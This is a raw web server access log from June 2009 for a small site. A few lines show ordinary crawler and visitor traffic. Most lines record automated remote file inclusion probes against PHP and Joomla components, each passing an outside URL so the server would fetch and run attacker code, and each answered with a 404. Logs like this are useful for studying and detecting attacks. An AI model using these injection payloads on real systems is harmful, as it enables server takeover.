213.189.2.38 - - [13/Jun/2009:11:13:55 -0700] "GET /logs/access_071012.log%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.dits.com.cn/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
217.147.29.190 - - [13/Jun/2009:11:14:19 -0700] "GET /logs/access_070812.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
217.147.29.190 - - [13/Jun/2009:11:14:30 -0700] "GET /logs/access_071012.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
213.189.2.38 - - [13/Jun/2009:11:15:25 -0700] "GET /logs/access_071012.log%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.dits.com.cn/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.6.22.163 - - [13/Jun/2009:11:16:23 -0700] "GET /clipart/lines/horizontal/?D=A HTTP/1.0" 200 710 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
217.147.29.190 - - [13/Jun/2009:11:17:48 -0700] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
217.147.29.190 - - [13/Jun/2009:11:17:48 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
217.147.29.190 - - [13/Jun/2009:11:17:48 -0700] "GET /logs/access_070812.log%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
75.33.142.63 - - [13/Jun/2009:11:21:50 -0700] "GET / HTTP/1.1" 200 9405 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; sbcydsl 3.12; YComp 5.0.0.0; YPC 3.2.0; .NET CLR 1.1.4322; IEMB3; IEMB3)" "www.projectpr.com"
75.33.142.63 - - [13/Jun/2009:11:21:50 -0700] "GET /clipart/pageHeaders/greenLeafBridge.gif HTTP/1.1" 200 47456 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; sbcydsl 3.12; YComp 5.0.0.0; YPC 3.2.0; .NET CLR 1.1.4322; IEMB3; IEMB3)" "www.projectpr.com"
75.33.142.63 - - [13/Jun/2009:11:21:50 -0700] "GET /clipart/lines/horizontal/darkgreen_gradient.gif HTTP/1.1" 200 709 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; sbcydsl 3.12; YComp 5.0.0.0; YPC 3.2.0; .NET CLR 1.1.4322; IEMB3; IEMB3)" "www.projectpr.com"
75.33.142.63 - - [13/Jun/2009:11:21:50 -0700] "GET /sitebuilder/images/navbar-0-active-65203.png HTTP/1.1" 200 250 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; sbcydsl 3.12; YComp 5.0.0.0; YPC 3.2.0; .NET CLR 1.1.4322; IEMB3; IEMB3)" "www.projectpr.com"
75.33.142.63 - - [13/Jun/2009:11:21:50 -0700] "GET /clipart/images/sidebars/leafLeft.gif HTTP/1.1" 200 33964 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; sbcydsl 3.12; YComp 5.0.0.0; YPC 3.2.0; .NET CLR 1.1.4322; IEMB3; IEMB3)" "www.projectpr.com"
75.33.142.63 - - [13/Jun/2009:11:21:50 -0700] "GET /sitebuilder/images/navbar-1-inactive-65328.png HTTP/1.1" 200 273 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; sbcydsl 3.12; YComp 5.0.0.0; YPC 3.2.0; .NET CLR 1.1.4322; IEMB3; IEMB3)" "www.projectpr.com"
75.33.142.63 - - [13/Jun/2009:11:21:51 -0700] "GET /sitebuilder/images/navbar-2-inactive-65484.png HTTP/1.1" 200 303 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; sbcydsl 3.12; YComp 5.0.0.0; YPC 3.2.0; .NET CLR 1.1.4322; IEMB3; IEMB3)" "www.projectpr.com"
75.33.142.63 - - [13/Jun/2009:11:21:51 -0700] "GET /sitebuilder/images/navbar-3-inactive-65640.png HTTP/1.1" 200 298 "http://www.projectpr.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; sbcydsl 3.12; YComp 5.0.0.0; YPC 3.2.0; .NET CLR 1.1.4322; IEMB3; IEMB3)" "www.projectpr.com"
75.33.142.63 - - [13/Jun/2009:11:21:51 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; sbcydsl 3.12; YComp 5.0.0.0; YPC 3.2.0; .NET CLR 1.1.4322; IEMB3; IEMB3)" "www.projectpr.com"
217.169.210.130 - - [13/Jun/2009:11:28:17 -0700] "GET /logs/access_070812.log/administrator/errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
217.169.210.130 - - [13/Jun/2009:11:28:17 -0700] "GET /administrator/errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
217.169.210.130 - - [13/Jun/2009:11:28:17 -0700] "GET /logs/administrator/errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
91.121.112.152 - - [13/Jun/2009:11:30:24 -0700] "GET /logs/access_071112.log//modules/xfsection/modify.php?dir_module=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
91.121.112.152 - - [13/Jun/2009:11:30:24 -0700] "GET /modules/xfsection/modify.php?dir_module=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
91.121.112.152 - - [13/Jun/2009:11:30:24 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
63.223.85.28 - - [13/Jun/2009:11:33:53 -0700] "GET /atom.php5?page=http://portal.sterbinszky.hu/media/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
63.223.85.28 - - [13/Jun/2009:11:33:53 -0700] "GET /logs/access.log%20%20//atom.php5?page=http://portal.sterbinszky.hu/media/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
63.223.85.28 - - [13/Jun/2009:11:33:53 -0700] "GET /logs//atom.php5?page=http://portal.sterbinszky.hu/media/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.6.22.163 - - [13/Jun/2009:11:35:54 -0700] "GET /clipart/images/?D=D HTTP/1.0" 200 806 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
91.121.112.152 - - [13/Jun/2009:11:37:17 -0700] "GET /logs/access_071212.log//modules/xfsection/modify.php?dir_module=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
91.121.112.152 - - [13/Jun/2009:11:39:05 -0700] "GET /modules/xfsection/modify.php?dir_module=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
217.169.210.130 - - [13/Jun/2009:11:47:23 -0700] "GET /logs/access_070912.log/administrator/errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
217.169.210.130 - - [13/Jun/2009:11:47:23 -0700] "GET /administrator/errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
217.169.210.130 - - [13/Jun/2009:11:47:24 -0700] "GET /logs/administrator/errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
217.169.210.130 - - [13/Jun/2009:11:51:45 -0700] "GET /logs/access_071012.log/administrator/errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
74.54.32.201 - - [13/Jun/2009:11:55:35 -0700] "GET /logs//include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.54.32.201 - - [13/Jun/2009:11:55:35 -0700] "GET /include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.54.32.201 - - [13/Jun/2009:11:55:39 -0700] "GET /logs/access_071012.log//include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
84.201.208.50 - - [13/Jun/2009:11:56:33 -0700] "GET /include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
84.201.208.50 - - [13/Jun/2009:11:56:33 -0700] "GET /logs/access_071012.log//include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
84.201.208.50 - - [13/Jun/2009:11:56:33 -0700] "GET /logs//include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.54.32.201 - - [13/Jun/2009:11:57:27 -0700] "GET /logs/access_071012.log%20%20//include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
84.201.208.50 - - [13/Jun/2009:11:58:36 -0700] "GET /logs/access_071012.log%20%20//include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.54.32.201 - - [13/Jun/2009:11:59:01 -0700] "GET /logs/access_070912.log%20%20//include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [13/Jun/2009:11:59:57 -0700] "GET /logs/access_071012.log//include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [13/Jun/2009:11:59:57 -0700] "GET /include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [13/Jun/2009:11:59:57 -0700] "GET /logs//include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [13/Jun/2009:12:00:32 -0700] "GET /logs/access_071012.log%20%20//include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
84.201.208.50 - - [13/Jun/2009:12:00:45 -0700] "GET /logs/access_070912.log%20%20//include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
217.169.210.130 - - [13/Jun/2009:12:01:31 -0700] "GET /logs/access_070512.log/administrator/errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
217.169.210.130 - - [13/Jun/2009:12:01:31 -0700] "GET /administrator/errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
217.169.210.130 - - [13/Jun/2009:12:01:32 -0700] "GET /logs/administrator/errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
217.169.210.130 - - [13/Jun/2009:12:01:32 -0700] "GET /logs/access_070712.log/administrator/errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
74.54.32.201 - - [13/Jun/2009:12:05:38 -0700] "GET /logs/access_071012.log//include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.54.32.201 - - [13/Jun/2009:12:05:45 -0700] "GET /include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
84.201.208.50 - - [13/Jun/2009:12:06:45 -0700] "GET /logs/access_070912.log//include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
84.201.208.50 - - [13/Jun/2009:12:06:54 -0700] "GET /logs//include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
84.201.208.50 - - [13/Jun/2009:12:06:54 -0700] "GET /logs/access_071012.log//include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
84.201.208.50 - - [13/Jun/2009:12:06:54 -0700] "GET /include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [13/Jun/2009:12:07:03 -0700] "GET /logs/access_071012.log//include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [13/Jun/2009:12:07:03 -0700] "GET /logs//include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [13/Jun/2009:12:07:03 -0700] "GET /include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.54.32.201 - - [13/Jun/2009:12:07:21 -0700] "GET /logs/access_071012.log%20%20//include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
84.201.208.50 - - [13/Jun/2009:12:08:21 -0700] "GET /logs/access_071012.log%20%20//include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [13/Jun/2009:12:08:43 -0700] "GET /logs/access_071012.log%20%20//include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.54.32.201 - - [13/Jun/2009:12:09:03 -0700] "GET /logs/access_070912.log%20%20//include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
84.201.208.50 - - [13/Jun/2009:12:10:05 -0700] "GET /logs/access_070912.log%20%20//include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [13/Jun/2009:12:10:35 -0700] "GET /logs/access_070912.log%20%20//include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.54.32.201 - - [13/Jun/2009:12:11:45 -0700] "GET /logs/access_070912.log//include.php?path[docroot]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
217.147.29.190 - - [13/Jun/2009:12:24:40 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
217.147.29.190 - - [13/Jun/2009:12:24:40 -0700] "GET /skin/zero_vote/error.php?dir=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
217.147.29.190 - - [13/Jun/2009:12:24:40 -0700] "GET /logs/access_071112.log%20%20//skin/zero_vote/error.php?dir=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
217.147.29.190 - - [13/Jun/2009:12:26:38 -0700] "GET /logs/access_071212.log%20%20//skin/zero_vote/error.php?dir=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
91.198.32.3 - - [13/Jun/2009:12:26:44 -0700] "GET /skin/zero_vote/error.php?dir=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
91.198.32.3 - - [13/Jun/2009:12:26:44 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
91.198.32.3 - - [13/Jun/2009:12:26:44 -0700] "GET /logs/access_071212.log//skin/zero_vote/error.php?dir=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
74.54.32.201 - - [13/Jun/2009:12:41:58 -0700] "GET /include/bbs.lib.inc.php?site_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.54.32.201 - - [13/Jun/2009:12:41:58 -0700] "GET /logs/scripts.log%20%20//include/bbs.lib.inc.php?site_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.54.32.201 - - [13/Jun/2009:12:41:58 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
84.201.208.50 - - [13/Jun/2009:12:45:52 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
84.201.208.50 - - [13/Jun/2009:12:45:52 -0700] "GET /logs/scripts.log%20%20//include/bbs.lib.inc.php?site_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
84.201.208.50 - - [13/Jun/2009:12:45:52 -0700] "GET /include/bbs.lib.inc.php?site_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [13/Jun/2009:12:46:56 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [13/Jun/2009:12:46:56 -0700] "GET /include/bbs.lib.inc.php?site_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [13/Jun/2009:12:46:56 -0700] "GET /logs/scripts.log%20%20//include/bbs.lib.inc.php?site_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
217.147.29.190 - - [13/Jun/2009:12:47:24 -0700] "GET /ray/modules/global/inc/content.inc.php?sIncPath=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
217.147.29.190 - - [13/Jun/2009:12:47:24 -0700] "GET /logs//ray/modules/global/inc/content.inc.php?sIncPath=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
217.147.29.190 - - [13/Jun/2009:12:47:24 -0700] "GET /logs/scripts.log%20%20//ray/modules/global/inc/content.inc.php?sIncPath=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
217.147.30.80 - - [13/Jun/2009:13:00:58 -0700] "GET /logs/access_071212.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
217.147.30.80 - - [13/Jun/2009:13:00:58 -0700] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
217.147.30.80 - - [13/Jun/2009:13:00:58 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
75.145.152.113 - - [13/Jun/2009:13:01:19 -0700] "GET /logs/access_071212.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://cafe0.fileave.com/id.feelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
75.145.152.113 - - [13/Jun/2009:13:01:24 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://cafe0.fileave.com/id.feelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
75.145.152.113 - - [13/Jun/2009:13:01:24 -0700] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://cafe0.fileave.com/id.feelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
217.147.30.80 - - [13/Jun/2009:13:04:18 -0700] "GET /logs/access_071212.log%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
75.145.152.113 - - [13/Jun/2009:13:04:27 -0700] "GET /logs/access_070912.log%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://cafe0.fileave.com/id.feelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
217.147.30.80 - - [13/Jun/2009:13:05:12 -0700] "GET /logs/access_070912.log%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
70.85.42.34 - - [13/Jun/2009:13:06:24 -0700] "GET /logs/access_071112.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://pinky.caucasus.net/V7ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.projectpr.com"
70.85.42.34 - - [13/Jun/2009:13:06:24 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://pinky.caucasus.net/V7ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.projectpr.com"
70.85.42.34 - - [13/Jun/2009:13:06:39 -0700] "GET /logs/access_071212.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://pinky.caucasus.net/V7ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.projectpr.com"
200.93.147.154 - - [13/Jun/2009:13:11:17 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://3dcgfx.net/3dcgfx//modules/Forums/admin/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.projectpr.com"
200.93.147.154 - - [13/Jun/2009:13:11:20 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://3dcgfx.net/3dcgfx//modules/Forums/admin/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.projectpr.com"
63.223.85.28 - - [13/Jun/2009:13:13:47 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://portal.sterbinszky.hu/media/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
63.223.85.28 - - [13/Jun/2009:13:13:47 -0700] "GET /logs/access.log%20%20/joomla/index.php?option=com_restaurante&task=http://portal.sterbinszky.hu/media/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
63.223.85.28 - - [13/Jun/2009:13:13:47 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://portal.sterbinszky.hu/media/1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
213.180.209.10 - - [13/Jun/2009:13:43:01 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "YandexSomething/1.0" "www.projectpr.com"
213.180.209.10 - - [13/Jun/2009:13:46:16 -0700] "GET / HTTP/1.1" 200 9405 "-" "YandexSomething/1.0" "www.projectpr.com"
213.180.209.10 - - [13/Jun/2009:14:00:20 -0700] "GET /index.html HTTP/1.1" 200 9405 "-" "YandexSomething/1.0" "www.projectpr.com"
151.1.154.24 - - [13/Jun/2009:14:06:36 -0700] "GET /logs/access_070812.log//components/com_smf/smf.php?mosConfig_absolute_path=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.projectpr.com"
151.1.154.24 - - [13/Jun/2009:14:06:37 -0700] "GET /components/com_smf/smf.php?mosConfig_absolute_path=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.projectpr.com"
91.198.32.3 - - [13/Jun/2009:14:13:54 -0700] "GET /logs/access_070912.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
91.198.32.3 - - [13/Jun/2009:14:13:54 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
91.198.32.3 - - [13/Jun/2009:14:13:55 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
151.1.154.24 - - [13/Jun/2009:14:13:59 -0700] "GET /components/com_smf/smf.php?mosConfig_absolute_path=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
91.198.32.3 - - [13/Jun/2009:14:14:06 -0700] "GET /logs/access_071012.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
201.232.54.48 - - [13/Jun/2009:14:21:21 -0700] "GET /logs/access_070812.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
201.232.54.48 - - [13/Jun/2009:14:21:21 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
200.103.16.12 - - [13/Jun/2009:14:21:26 -0700] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.scoringsessions.com///img/large/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"